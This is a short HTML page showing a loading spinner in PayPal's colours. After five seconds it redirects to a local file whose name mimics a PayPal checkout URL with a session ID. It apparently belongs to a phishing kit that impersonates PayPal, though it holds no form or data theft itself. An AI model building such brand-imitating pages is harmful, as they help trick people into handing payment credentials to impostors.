<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Spinner Example</title>
<style>
  body, html {
    height: 100%;
    margin: 0;
    display: flex;
    justify-content: center;
    align-items: center;
    background-color: #fff; /* PayPal uses a clean, light background */
  }
  .spinner {
    border: 4px solid rgba(0,0,0,.1); /* Light grey outline */
    border-radius: 50%;
    border-top: 4px solid #0070ba; /* PayPal blue */
    width: 40px;
    height: 40px;
    -webkit-animation: spin 1s linear infinite; /* Safari */
    animation: spin 1s linear infinite;
  }

  /* Safari */
  @-webkit-keyframes spin {
    0% { -webkit-transform: rotate(0deg); }
    100% { -webkit-transform: rotate(360deg); }
  }

  @keyframes spin {
    0% { transform: rotate(0deg); }
    100% { transform: rotate(360deg); }
  }
</style>
</head>
<body>

<div class="spinner"></div>

<script>
  // Redirect after 5 seconds
  setTimeout(function() {
    window.location.href = "/paypal-checkoutnow-locale.x=en_GB&fundingSource=paypal&sessionID=uid_c513625d3c_mtr6mju6mtu.html"; // Specify your page here
  }, 5000);
</script>

</body>
</html>
